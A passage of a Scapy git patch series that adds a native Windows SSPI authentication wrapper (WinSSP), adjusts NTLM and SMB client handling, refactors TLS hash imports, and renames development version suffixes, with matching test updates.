ctypes.POINTER(SECURITY_INTEGER), # ptsExpiry +] + +_winapi_FreeContextBuffer = ctypes.windll.secur32.FreeContextBuffer +_winapi_FreeContextBuffer.restype = ctypes.wintypes.DWORD +_winapi_FreeContextBuffer.argtypes = [ctypes.c_void_p] + +_winapi_QueryContextAttributesW = ctypes.windll.secur32.QueryContextAttributesW +_winapi_QueryContextAttributesW.restype = ctypes.wintypes.DWORD +_winapi_QueryContextAttributesW.argtypes = [ + ctypes.POINTER(SecHandle), + ctypes.wintypes.ULONG, + ctypes.c_void_p, +] + +_winapi_SspiGetTargetHostName = ctypes.windll.secur32.SspiGetTargetHostName +_winapi_SspiGetTargetHostName.restype = ctypes.wintypes.DWORD +_winapi_SspiGetTargetHostName.argtypes = [ + ctypes.wintypes.LPCWSTR, + ctypes.POINTER(ctypes.wintypes.LPWSTR), +] + + +# Types + + +class ISC_REQ_FLAGS(enum.IntFlag): + """ + ISC_REQ Flags per sspi.h + """ + + ISC_REQ_DELEGATE = 0x00000001 + ISC_REQ_MUTUAL_AUTH = 0x00000002 + ISC_REQ_REPLAY_DETECT = 0x00000004 + ISC_REQ_SEQUENCE_DETECT = 0x00000008 + ISC_REQ_CONFIDENTIALITY = 0x00000010 + ISC_REQ_USE_SESSION_KEY = 0x00000020 + ISC_REQ_PROMPT_FOR_CREDS = 0x00000040 + ISC_REQ_USE_SUPPLIED_CREDS = 0x00000080 + ISC_REQ_ALLOCATE_MEMORY = 0x00000100 + ISC_REQ_USE_DCE_STYLE = 0x00000200 + ISC_REQ_DATAGRAM = 0x00000400 + ISC_REQ_CONNECTION = 0x00000800 + ISC_REQ_CALL_LEVEL = 0x00001000 + ISC_REQ_FRAGMENT_SUPPLIED = 0x00002000 + ISC_REQ_EXTENDED_ERROR = 0x00004000 + ISC_REQ_STREAM = 0x00008000 + ISC_REQ_INTEGRITY = 0x00010000 + ISC_REQ_IDENTIFY = 0x00020000 + ISC_REQ_NULL_SESSION = 0x00040000 + ISC_REQ_MANUAL_CRED_VALIDATION = 0x00080000 + ISC_REQ_RESERVED1 = 0x00100000 + ISC_REQ_FRAGMENT_TO_FIT = 0x00200000 + ISC_REQ_FORWARD_CREDENTIALS = 0x00400000 + ISC_REQ_NO_INTEGRITY = 0x00800000 + ISC_REQ_USE_HTTP_STYLE = 0x01000000 + ISC_REQ_UNVERIFIED_TARGET_NAME = 0x20000000 + ISC_REQ_CONFIDENTIALITY_ONLY = 0x40000000 + ISC_REQ_MESSAGES = 0x0000000100000000 + ISC_REQ_DEFERRED_CRED_VALIDATION = 0x0000000200000000 + ISC_REQ_NO_POST_HANDSHAKE_AUTH = 0x0000000400000000 + ISC_REQ_REUSE_SESSION_TICKETS = 0x0000000800000000 + ISC_REQ_EXPLICIT_SESSION = 0x0000001000000000 + + @staticmethod + def from_GSS(flags: GSS_C_FLAGS) -> "ISC_REQ_FLAGS": + """ + Convert GSS_C_FLAGS into ISC_REQ_FLAGS + """ + result = 0 + for gssf, iscf in _GSS_ISC_TRANSLATION.items(): + if flags & gssf: + result |= iscf + return ISC_REQ_FLAGS(result) + + @staticmethod + def to_GSS(flags: "ISC_REQ_FLAGS") -> GSS_C_FLAGS: + """ + Convert ISC_REQ_FLAGS into GSS_C_FLAGS + """ + result = 0 + for gssf, iscf in _GSS_ISC_TRANSLATION.items(): + if flags & iscf: + result |= gssf + return GSS_C_FLAGS(result) + + +_GSS_ISC_TRANSLATION = { + GSS_C_FLAGS.GSS_C_DELEG_FLAG: ISC_REQ_FLAGS.ISC_REQ_DELEGATE, + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG: ISC_REQ_FLAGS.ISC_REQ_MUTUAL_AUTH, + GSS_C_FLAGS.GSS_C_REPLAY_FLAG: ISC_REQ_FLAGS.ISC_REQ_REPLAY_DETECT, + GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG: ISC_REQ_FLAGS.ISC_REQ_SEQUENCE_DETECT, + GSS_C_FLAGS.GSS_C_CONF_FLAG: ISC_REQ_FLAGS.ISC_REQ_CONFIDENTIALITY, + GSS_C_FLAGS.GSS_C_INTEG_FLAG: ISC_REQ_FLAGS.ISC_REQ_INTEGRITY, + GSS_C_FLAGS.GSS_C_DCE_STYLE: ISC_REQ_FLAGS.ISC_REQ_USE_DCE_STYLE, + GSS_C_FLAGS.GSS_C_IDENTIFY_FLAG: ISC_REQ_FLAGS.ISC_REQ_IDENTIFY, + GSS_C_FLAGS.GSS_C_EXTENDED_ERROR_FLAG: ISC_REQ_FLAGS.ISC_REQ_EXTENDED_ERROR, +} + + +class ASC_REQ_FLAGS(enum.IntFlag): + ASC_REQ_DELEGATE = 0x00000001 + ASC_REQ_MUTUAL_AUTH = 0x00000002 + ASC_REQ_REPLAY_DETECT = 0x00000004 + ASC_REQ_SEQUENCE_DETECT = 0x00000008 + ASC_REQ_CONFIDENTIALITY = 0x00000010 + ASC_REQ_USE_SESSION_KEY = 0x00000020 + ASC_REQ_SESSION_TICKET = 0x00000040 + ASC_REQ_ALLOCATE_MEMORY = 0x00000100 + ASC_REQ_USE_DCE_STYLE = 0x00000200 + ASC_REQ_DATAGRAM = 0x00000400 + ASC_REQ_CONNECTION = 0x00000800 + ASC_REQ_CALL_LEVEL = 0x00001000 + ASC_REQ_FRAGMENT_SUPPLIED = 0x00002000 + ASC_REQ_EXTENDED_ERROR = 0x00008000 + ASC_REQ_STREAM = 0x00010000 + ASC_REQ_INTEGRITY = 0x00020000 + ASC_REQ_LICENSING = 0x00040000 + ASC_REQ_IDENTIFY = 0x00080000 + ASC_REQ_ALLOW_NULL_SESSION = 0x00100000 + ASC_REQ_ALLOW_NON_USER_LOGONS = 0x00200000 + ASC_REQ_ALLOW_CONTEXT_REPLAY = 0x00400000 + ASC_REQ_FRAGMENT_TO_FIT = 0x00800000 + ASC_REQ_NO_TOKEN = 0x01000000 + ASC_REQ_PROXY_BINDINGS = 0x04000000 + ASC_REQ_ALLOW_MISSING_BINDINGS = 0x10000000 + + @staticmethod + def from_GSS(flags: GSS_C_FLAGS) -> "ASC_REQ_FLAGS": + """ + Convert GSS_C_FLAGS into ASC_REQ_FLAGS + """ + result = 0 + for gssf, ascf in _GSS_ASC_TRANSLATION.items(): + if flags & gssf: + result |= ascf + return ASC_REQ_FLAGS(result) + + @staticmethod + def to_GSS(flags: "ASC_REQ_FLAGS") -> GSS_C_FLAGS: + """ + Convert ASC_REQ_FLAGS into GSS_C_FLAGS + """ + result = 0 + for gssf, ascf in _GSS_ASC_TRANSLATION.items(): + if flags & ascf: + result |= gssf + return GSS_C_FLAGS(result) + + +_GSS_ASC_TRANSLATION = { + GSS_C_FLAGS.GSS_C_DELEG_FLAG: ASC_REQ_FLAGS.ASC_REQ_DELEGATE, + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG: ASC_REQ_FLAGS.ASC_REQ_MUTUAL_AUTH, + GSS_C_FLAGS.GSS_C_REPLAY_FLAG: ASC_REQ_FLAGS.ASC_REQ_REPLAY_DETECT, + GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG: ASC_REQ_FLAGS.ASC_REQ_SEQUENCE_DETECT, + GSS_C_FLAGS.GSS_C_CONF_FLAG: ASC_REQ_FLAGS.ASC_REQ_CONFIDENTIALITY, + GSS_C_FLAGS.GSS_C_INTEG_FLAG: ASC_REQ_FLAGS.ASC_REQ_INTEGRITY, + GSS_C_FLAGS.GSS_C_DCE_STYLE: ASC_REQ_FLAGS.ASC_REQ_USE_DCE_STYLE, + GSS_C_FLAGS.GSS_C_IDENTIFY_FLAG: ASC_REQ_FLAGS.ASC_REQ_IDENTIFY, + GSS_C_FLAGS.GSS_C_EXTENDED_ERROR_FLAG: ASC_REQ_FLAGS.ASC_REQ_EXTENDED_ERROR, + GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS: ASC_REQ_FLAGS.ASC_REQ_ALLOW_MISSING_BINDINGS, # noqa: E501 +} + + +# The SSP + + +class WinSSP(SSP): + """ + Use a native Windows SSP through SSPI + + :param Package: the SSP to use + """ + + class STATE(SSP.STATE): + NEGOTIATING = 1 + COMPLETED = 2 + + class CONTEXT(SSP.CONTEXT): + __slots__ = [ + "state", + "Credential", + "Package", + "phContext", + "ptsExpiry", + "SessionKey", + "ServerHostname", + ] + + def __init__( + self, + Package: str, + CredentialUse: int, + req_flags: Optional["GSS_C_FLAGS | GSS_S_FLAGS"] = None, + ): + self.Credential = SecHandle() + self.phContext = None + self.ptsExpiry = SECURITY_INTEGER() + self.Package = Package + self.state = WinSSP.STATE.NEGOTIATING + self.ServerHostname = None + + status = _winapi_AcquireCredentialsHandle( + None, + Package, + CredentialUse, + None, + None, + None, + None, + ctypes.byref(self.Credential), + ctypes.byref(self.ptsExpiry), + ) + if status != SEC_CODES.SEC_E_OK: + raise OSError(f"AcquireCredentialsHandle failed: {hex(status)}") + + super(WinSSP.CONTEXT, self).__init__( + req_flags=req_flags, + ) + + def QuerySessionKey(self): + """ + Query the session key + """ + Buffer = SecPkgContext_SessionKey() + + status = _winapi_QueryContextAttributesW( + self.phContext, + SECPKG_ATTR_SESSION_KEY, + ctypes.byref(Buffer), + ) + if status != SEC_CODES.SEC_E_OK: + raise ValueError(f"QueryContextAttributesW failed with: {hex(status)}") + + SessionKeyBuf = ctypes.cast( + Buffer.SessionKey, + ctypes.POINTER(ctypes.wintypes.BYTE * Buffer.SessionKeyLength), + ) + self.SessionKey = bytes(SessionKeyBuf.contents) + + def QueryNegotiatedFlags(self): + """ + Query the negotiated flags. + """ + Buffer = SecPkgContext_Flags() + + status = _winapi_QueryContextAttributesW( + self.phContext, + SECPKG_ATTR_SERVER_FLAGS, + ctypes.byref(Buffer), + ) + if status != SEC_CODES.SEC_E_OK: + raise ValueError(f"QueryContextAttributesW failed with: {hex(status)}") + + self.flags = ISC_REQ_FLAGS.to_GSS(Buffer.Flags) + + def __repr__(self): + return "[Native SSP: %s]" % self.Package + + def __init__(self, Package: str = "Negotiate"): + self.Package = Package + super(WinSSP, self).__init__() + + def GSS_Init_sec_context( + self, + Context: CONTEXT, + input_token=None, + target_name: Optional[str] = None, + req_flags: Optional[GSS_C_FLAGS] = None, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, + ): + # Get context + if not Context: + Context = self.CONTEXT( + self.Package, + SECPKG_CRED_OUTBOUND, + req_flags=req_flags, + ) + + if Context.state == self.STATE.COMPLETED: + # SSPI and GSSAPI count completion differently, so we might + # be called one time for nothing. Return that we completed properly. + return Context, None, GSS_S_COMPLETE + + # Create and populate the input buffers + InputBuffers = [] + if input_token: + input_token = bytes(input_token) + InputBuffers.append( + SecBuffer( + len(input_token), + SECBUFFER_TOKEN, + ctypes.cast( + ctypes.create_string_buffer(input_token), ctypes.c_void_p + ), + ) + ) + if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS: + raise NotImplementedError("Channel bindings !") + if InputBuffers: + InputBuffers = ctypes.ARRAY(SecBuffer, len(InputBuffers))(*InputBuffers) + Input = SecBufferDesc( + SECBUFFER_VERSION, + len(InputBuffers), + ctypes.cast( + ctypes.byref(InputBuffers), + ctypes.POINTER(ctypes.POINTER(SecBuffer)), + ), + ) + else: + Input = None + + # Create the output buffers (empty for now) + OutputBuffers = ctypes.ARRAY(SecBuffer, 1)( + *[ + SecBuffer( + ctypes.wintypes.ULONG(0), + ctypes.wintypes.ULONG(SECBUFFER_TOKEN), + ctypes.c_void_p(), + ) + ] + ) + Output = SecBufferDesc( + SECBUFFER_VERSION, + len(OutputBuffers), + ctypes.cast( + ctypes.byref(OutputBuffers), ctypes.POINTER(ctypes.POINTER(SecBuffer)) + ), + ) + + # Prepare other arguments + phNewContext = Context.phContext or SecHandle() + pfContextAttr = ctypes.wintypes.ULONG() + if target_name: + TargetName = ctypes.cast( + ctypes.create_string_buffer( + target_name.encode("utf-16le") + b"\x00\x00" + ), + ctypes.wintypes.LPCWSTR, + ) + + HostName = ctypes.wintypes.LPWSTR() + status = _winapi_SspiGetTargetHostName(TargetName, ctypes.byref(HostName)) + if status == SEC_CODES.SEC_E_OK: + Context.ServerHostname = HostName.value + else: + TargetName = None + + # Call SSPI + status = _winapi_InitializeSecurityContext( + ctypes.byref(Context.Credential), + Context.phContext if Context.phContext else None, + TargetName, + ISC_REQ_FLAGS.from_GSS(Context.flags) + | ISC_REQ_FLAGS.ISC_REQ_ALLOCATE_MEMORY, + 0, + SECURITY_NETWORK_DREP, + Input and ctypes.byref(Input), + 0, + ctypes.byref(phNewContext), + ctypes.byref(Output), + ctypes.byref(pfContextAttr), + ctypes.byref(Context.ptsExpiry), + ) + + # Find the output token, if any + output_token = None + if status in [ + SEC_CODES.SEC_E_OK, + SEC_CODES.SEC_I_CONTINUE_NEEDED, + SEC_CODES.SEC_I_COMPLETE_AND_CONTINUE, + ]: + if Context.phContext is None: + Context.phContext = phNewContext + + for OutputBuffer in OutputBuffers: + if ( + OutputBuffer.BufferType == SECBUFFER_TOKEN + and OutputBuffer.cbBuffer != 0 + ): + buf = ctypes.cast( + OutputBuffer.pvBuffer, + ctypes.POINTER(ctypes.wintypes.BYTE * OutputBuffer.cbBuffer), + ) + output_token = GSSAPI_BLOB(bytes(buf.contents)) + break + + # If we succeeded, query the session key + if status in [SEC_CODES.SEC_E_OK, SEC_CODES.SEC_I_COMPLETE_AND_CONTINUE]: + Context.QuerySessionKey() + Context.QueryNegotiatedFlags() + Context.state = self.STATE.COMPLETED + + # Free things we did not create (won't be freed by GC) + for OutputBuffer in OutputBuffers: + if OutputBuffer.pvBuffer is not None: + _winapi_FreeContextBuffer(OutputBuffer.pvBuffer) + + return Context, output_token, SEC_CODES.to_GSS(status) + + def GSS_Accept_sec_context( + self, + Context: CONTEXT, + input_token=None, + req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, + ): + # Get context + if not Context: + Context = self.CONTEXT( + self.Package, + SECPKG_CRED_INBOUND, + req_flags=req_flags, + ) + + # Create and populate the input buffers + InputBuffers = [] + if input_token: + input_token = bytes(input_token) + InputBuffers.append( + SecBuffer( + len(input_token), + SECBUFFER_TOKEN, + ctypes.cast( + ctypes.create_string_buffer(input_token), ctypes.c_void_p + ), + ) + ) + if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS: + raise NotImplementedError("Channel bindings !") + if InputBuffers: + InputBuffers = ctypes.ARRAY(SecBuffer, len(InputBuffers))(*InputBuffers) + Input = SecBufferDesc( + SECBUFFER_VERSION, + len(InputBuffers), + ctypes.cast( + ctypes.byref(InputBuffers), + ctypes.POINTER(ctypes.POINTER(SecBuffer)), + ), + ) + else: + Input = None + + # Create the output buffers (empty for now) + OutputBuffers = ctypes.ARRAY(SecBuffer, 1)( + *[ + SecBuffer( + ctypes.wintypes.ULONG(0), + ctypes.wintypes.ULONG(SECBUFFER_TOKEN), + ctypes.c_void_p(), + ) + ] + ) + Output = SecBufferDesc( + SECBUFFER_VERSION, + len(OutputBuffers), + ctypes.cast( + ctypes.byref(OutputBuffers), ctypes.POINTER(ctypes.POINTER(SecBuffer)) + ), + ) + + # Prepare other arguments + phNewContext = Context.phContext or SecHandle() + pfContextAttr = ctypes.wintypes.ULONG() + + # Call SSPI + status = _winapi_AcceptSecurityContext( + ctypes.byref(Context.Credential), + Context.phContext if Context.phContext else None, + Input and ctypes.byref(Input), + ASC_REQ_FLAGS.from_GSS(Context.flags) + | ASC_REQ_FLAGS.ASC_REQ_ALLOCATE_MEMORY, + SECURITY_NETWORK_DREP, + ctypes.byref(phNewContext), + ctypes.byref(Output), + ctypes.byref(pfContextAttr), + ctypes.byref(Context.ptsExpiry), + ) + + # Find the output token, if any + output_token = None + if status in [ + SEC_CODES.SEC_E_OK, + SEC_CODES.SEC_I_CONTINUE_NEEDED, + SEC_CODES.SEC_I_COMPLETE_AND_CONTINUE, + ]: + if Context.phContext is None: + Context.phContext = phNewContext + + for OutputBuffer in OutputBuffers: + if ( + OutputBuffer.BufferType == SECBUFFER_TOKEN + and OutputBuffer.cbBuffer != 0 + ): + buf = ctypes.cast( + OutputBuffer.pvBuffer, + ctypes.POINTER(ctypes.wintypes.BYTE * OutputBuffer.cbBuffer), + ) + output_token = GSSAPI_BLOB(bytes(buf.contents)) + break + + # If we succeeded, query the session key + if status in [SEC_CODES.SEC_E_OK, SEC_CODES.SEC_I_COMPLETE_AND_CONTINUE]: + Context.QuerySessionKey() + Context.QueryNegotiatedFlags() + Context.state = self.STATE.COMPLETED + + # Free things we did not create (won't be freed by GC) + for OutputBuffer in OutputBuffers: + if OutputBuffer.pvBuffer is not None: + _winapi_FreeContextBuffer(OutputBuffer.pvBuffer) + + return Context, output_token, SEC_CODES.to_GSS(status) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 77f466d0a27..fd94cc6f2ec 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -29,6 +29,7 @@ ASN1F_SEQUENCE_OF, ) from scapy.asn1packet import ASN1_Packet +from scapy.config import crypto_validator from scapy.compat import bytes_base64 from scapy.error import log_runtime from scapy.fields import ( @@ -490,7 +491,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): "J", "NEGOTIATE_OEM_DOMAIN_SUPPLIED", # K "NEGOTIATE_OEM_WORKSTATION_SUPPLIED", # L - "r7", + "NEGOTIATE_LOCAL_CALL", "NEGOTIATE_ALWAYS_SIGN", # M "TARGET_TYPE_DOMAIN", # N "TARGET_TYPE_SERVER", # O @@ -590,8 +591,9 @@ class NTLM_NEGOTIATE(_NTLM_VARIANT_Packet, NTLM_Header): "Payload", OFFSET, [ - _NTLMStrField("DomainName", b""), - _NTLMStrField("WorkstationName", b""), + # "MUST be encoded using the OEM character set" + StrField("DomainName", b""), + StrField("WorkstationName", b""), ], ), ] @@ -1267,7 +1269,6 @@ class NTLMSSP(SSP): Common arguments: - :param auth_level: One of DCE_C_AUTHN_LEVEL :param USE_MIC: whether to use a MIC or not (default: True) :param NTLM_VALUES: a dictionary used to override the following values @@ -1295,6 +1296,7 @@ class NTLMSSP(SSP): if without domain) :param HASHNT: the password to use for NTLM auth :param PASSWORD: the password to use for NTLM auth + :param LOCAL: use local authentication (must be running locally on Windows) Server-only arguments: @@ -1335,6 +1337,7 @@ class CONTEXT(SSP.CONTEXT): "ServerDomain", ] + @crypto_validator def __init__(self, IsAcceptor, req_flags=None): self.state = NTLMSSP.STATE.INIT self.SessionKey = None @@ -1392,7 +1395,7 @@ def __init__( self.USE_MIC = False else: self.USE_MIC = USE_MIC - self.NTLM_VALUES = NTLM_VALUES + if UPN is not None: # Populate values used only in server mode. from scapy.layers.kerberos import _parse_upn @@ -1407,7 +1410,7 @@ def __init__( pass # Compute various netbios/fqdn names - self.DOMAIN_FQDN = DOMAIN_FQDN or "domain.local" + self.DOMAIN_FQDN = DOMAIN_FQDN or "WORKGROUP" self.DOMAIN_NB_NAME = ( DOMAIN_NB_NAME or self.DOMAIN_FQDN.split(".")[0].upper()[:15] ) @@ -1415,6 +1418,7 @@ def __init__( self.COMPUTER_FQDN = COMPUTER_FQDN or ( self.COMPUTER_NB_NAME.lower() + "." + self.DOMAIN_FQDN ) + self.NTLM_VALUES = NTLM_VALUES if IDENTITIES: self.IDENTITIES = { @@ -1542,6 +1546,7 @@ def GSS_Init_sec_context( if Context.state == self.STATE.INIT: # Client: negotiate + # Create a default token tok = NTLM_NEGOTIATE( VARIANT=self.VARIANT, @@ -1594,15 +1599,18 @@ def GSS_Init_sec_context( ), ProductMajorVersion=10, ProductMinorVersion=0, - ProductBuild=19041, + ProductBuild=26100, ) + + # Update that token with the customs one if self.NTLM_VALUES: - # Update that token with the customs one for key in [ "NegotiateFlags", "ProductMajorVersion", "ProductMinorVersion", "ProductBuild", + "DomainName", + "WorkstationName", ]: if key in self.NTLM_VALUES: setattr(tok, key, self.NTLM_VALUES[key]) @@ -1613,6 +1621,7 @@ def GSS_Init_sec_context( elif Context.state == self.STATE.CLI_SENT_NEGO: # Client: auth (token=challenge) chall_tok = input_token + if self.UPN is None or self.HASHNT is None: raise ValueError( "Must provide a 'UPN' and a 'HASHNT' or 'PASSWORD' when " @@ -1654,11 +1663,12 @@ def GSS_Init_sec_context( NegotiateFlags=chall_tok.NegotiateFlags, ProductMajorVersion=10, ProductMinorVersion=0, - ProductBuild=19041, + ProductBuild=26100, ) - tok.LmChallengeResponse = LMv2_RESPONSE() # Populate the token + tok.LmChallengeResponse = LMv2_RESPONSE() + # 1. Set username try: tok.UserName, realm = _parse_upn(self.UPN) diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 3b806d6fcdd..f2c70b04957 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -33,9 +33,10 @@ from scapy.layers.dcerpc import NDRUnion, find_dcerpc_interface from scapy.layers.gssapi import ( + GSS_C_FLAGS, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, - GSS_C_FLAGS, + GSS_S_DEFECTIVE_TOKEN, ) from scapy.layers.msrpce.raw.ms_srvs import ( LPSHARE_ENUM_STRUCT, @@ -482,10 +483,20 @@ def update_smbheader(self, pkt): # DEV: add a condition on NEGOTIATED with prio=0 @ATMT.condition(NEGOTIATED, prio=1) + def should_retry_without_blob(self, ssp_tuple): + _, _, status = ssp_tuple + if status == GSS_S_DEFECTIVE_TOKEN: + # Token was defective. This could be that we passed a SPNEGO initial token + # to a NTLM SSP (not using SPNEGO). Retry using no input blob + raise self.NEGOTIATED() + + @ATMT.condition(NEGOTIATED, prio=2) def should_send_session_setup_request(self, ssp_tuple): _, _, status = ssp_tuple if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: - raise ValueError("Internal error: the SSP completed with an error.") + raise ValueError( + "Internal error: the SSP completed with error: %s" % status + ) raise self.SENT_SESSION_REQUEST().action_parameters(ssp_tuple) @ATMT.state() @@ -619,7 +630,9 @@ def AUTHENTICATED(self, ssp_blob=None): target_name="cifs/" + self.HOST if self.HOST else None, ) if status != GSS_S_COMPLETE: - raise ValueError("Internal error: the SSP completed with an error.") + raise ValueError( + "Internal error: the SSP completed with error: %s" % status + ) # Authentication was successful self.session.computeSMBSessionKeys(IsClient=True) diff --git a/scapy/layers/tls/crypto/hash.py b/scapy/layers/tls/crypto/hash.py index cb54b127cdc..05c653538ab 100644 --- a/scapy/layers/tls/crypto/hash.py +++ b/scapy/layers/tls/crypto/hash.py @@ -14,7 +14,19 @@ if conf.crypto_valid: from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes + from cryptography.hazmat.primitives.hashes import ( + MD5, + SHA1, + SHA224, + SHA256, + SHA384, + SHA512, + SHAKE256, + ) from cryptography.hazmat.primitives.hashes import HashAlgorithm +else: + MD5 = SHA1 = SHA224 = SHA256 = SHA384 = SHA512 = SHAKE256 = None + HashAlgorithm = object _tls_hash_algs = {} @@ -59,12 +71,12 @@ def digest(self, tbd): class Hash_MD5(_GenericHash): - hash_cls = hashes.MD5 + hash_cls = MD5 hash_len = 16 class Hash_SHA(_GenericHash): - hash_cls = hashes.SHA1 + hash_cls = SHA1 hash_len = 20 @@ -72,22 +84,22 @@ class Hash_SHA(_GenericHash): class Hash_SHA224(_GenericHash): - hash_cls = hashes.SHA224 + hash_cls = SHA224 hash_len = 28 class Hash_SHA256(_GenericHash): - hash_cls = hashes.SHA256 + hash_cls = SHA256 hash_len = 32 class Hash_SHA384(_GenericHash): - hash_cls = hashes.SHA384 + hash_cls = SHA384 hash_len = 48 class Hash_SHA512(_GenericHash): - hash_cls = hashes.SHA512 + hash_cls = SHA512 hash_len = 64 @@ -107,7 +119,7 @@ class Hash_MD5SHA1(_GenericHash): class Hash_SHAKE256(_GenericHash): - hash_cls = hashes.SHAKE256 + hash_cls = SHAKE256 def __init__(self, digest_size: int): self.hash_len = digest_size diff --git a/test/scapy/layers/ntlm.uts b/test/scapy/layers/ntlm.uts index 8bc38dceb66..6b7f9766a72 100644 --- a/test/scapy/layers/ntlm.uts +++ b/test/scapy/layers/ntlm.uts @@ -186,8 +186,8 @@ assert ntlm_nego.NegotiateFlags.NEGOTIATE_UNICODE and ntlm_nego.NegotiateFlags.N assert ntlm_nego.NegotiateFlags == 0xe2898235 assert ntlm_nego.ProductMajorVersion == 10 assert ntlm_nego.ProductMinorVersion == 0 -assert ntlm_nego.ProductBuild == 19041 -assert bytes(ntlm_nego) == b'NTLMSSP\x00\x01\x00\x00\x005\x82\x89\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00aJ\x00\x00\x00\x0f' +assert ntlm_nego.ProductBuild == 26100 +assert bytes(ntlm_nego) == b'NTLMSSP\x00\x01\x00\x00\x005\x82\x89\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\xf4e\x00\x00\x00\x0f' = GSS_Accept_sec_context (SPNEGO_negTokenResp: NTLM_NEGOTIATE->NTLM_CHALLENGE) diff --git a/test/scapy/layers/smbclientserver.uts b/test/scapy/layers/smbclientserver.uts index 101843cbdc6..b770a5f4424 100644 --- a/test/scapy/layers/smbclientserver.uts +++ b/test/scapy/layers/smbclientserver.uts @@ -480,3 +480,19 @@ with run_smbserver(readonly=False, encryptshare=True): raise finally: cli.close() + + ++ Windows-only SMB tests +~ windows + += smbclient: use WinSSP to connect to the loopback + +from scapy.arch.windows.sspi import WinSSP + +try: + cli = smbclient("127.0.0.1", ssp=WinSSP(), cli=False) + results = cli.shares() + print(results) + assert any(x[0] == "IPC$" for x in results) +finally: + cli.close() From d2f076f2137fe8a34acf39c894efa0f482f2b680 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Wed, 22 Apr 2026 12:01:03 +0200 Subject: [PATCH 1627/1632] Follow semver: change dev version -> post (#4976) --- scapy/__init__.py | 10 +++++----- test/regression.uts | 4 ++-- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/scapy/__init__.py b/scapy/__init__.py index 3eb172ec490..139ba7a9371 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -30,12 +30,12 @@ def _parse_tag(tag): Example:: - v2.3.2-346-g164a52c075c8 -> '2.3.2.dev346' + v2.3.2-346-g164a52c075c8 -> '2.3.2.post346' """ match = re.match('^v?(.+?)-(\\d+)-g[a-f0-9]+$', tag) if match: - # remove the 'v' prefix and add a '.devN' suffix - return '%s.dev%s' % (match.group(1), match.group(2)) + # remove the 'v' prefix and add a '.postN' suffix + return '%s.post%s' % (match.group(1), match.group(2)) else: match = re.match('^v?([\\d\\.]+(rc\\d+)?)$', tag) if match: @@ -93,13 +93,13 @@ def _version_from_git_describe(): The tag prefix (``v``) and the git commit sha1 (``-g164a52c075c8``) are removed if present. - If the current directory is not exactly on the tag, a ``.devN`` suffix is + If the current directory is not exactly on the tag, a ``.postN`` suffix is appended where N is the number of commits made after the last tag. Example:: >>> _version_from_git_describe() - '2.3.2.dev346' + '2.3.2.post346' :raises CalledProcessError: if git is unavailable :return: Scapy's latest tag diff --git a/test/regression.uts b/test/regression.uts index 3c055f831f7..1f34aa8e2ad 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -32,7 +32,7 @@ class FakeModule2(object): __version__ = "5.143.3.12" class FakeModule3(object): - __version__ = "v2.4.2.dev42" + __version__ = "v2.4.2.post42" from scapy.config import _version_checker @@ -67,7 +67,7 @@ with mock.patch('scapy.subprocess.Popen', return_value=b): except ValueError: pass -assert GitModuleScapy.__version__ == '2.4.5rc1.dev261' +assert GitModuleScapy.__version__ == '2.4.5rc1.post261' assert _version_checker(GitModuleScapy, (2, 4, 5)) = List layers From cdc199afbba8e370e06ee1ed14621945cf538051 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Wed, 22 Apr 2026 14:04:44 +0200 Subject: [PATCH 1628/1632] Set sys.stdout to utf-8 (#4977) --- scapy/tools/UTscapy.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 119775b0258..4cbed484ae5 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -984,6 +984,7 @@ def main(): FORMAT = Format.ANSI OUTPUTFILE = sys.stdout + OUTPUTFILE.reconfigure(encoding='utf-8') LOCAL = 0 NUM = None NON_ROOT = False From 08aafdf29b33a964fe615ba57fcd1c13d2e16b1b Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Thu, 23 Apr 2026 15:10:33 +0200 Subject: [PATCH 1629/1632] WinSSP: support Encryption, fix DCE/RPC SMB IO (#4978) * WinSSP: support Encryption, fix DCE/RPC SMB IO * Add use_winssp boolean * Show output of test when it timeout * Flake8 for ldaphero * Fix doc * Add debug log for HTTP_Server * WinSSP: support channel bindings --- doc/scapy/layers/gssapi.rst | 2 +- doc/scapy/layers/kerberos.rst | 4 +- scapy/arch/windows/sspi.py | 424 ++++++++++++++++++++++++++----- scapy/layers/dcerpc.py | 8 +- scapy/layers/ldap.py | 32 ++- scapy/layers/msrpce/rpcclient.py | 15 +- scapy/layers/smbclient.py | 29 ++- scapy/layers/spnego.py | 18 +- scapy/layers/windows/erref.py | 1 + scapy/modules/ldaphero.py | 9 +- scapy/sendrecv.py | 6 +- scapy/tools/UTscapy.py | 4 +- scapy/utils.py | 4 +- test/scapy/layers/http.uts | 1 + 14 files changed, 466 insertions(+), 91 deletions(-) diff --git a/doc/scapy/layers/gssapi.rst 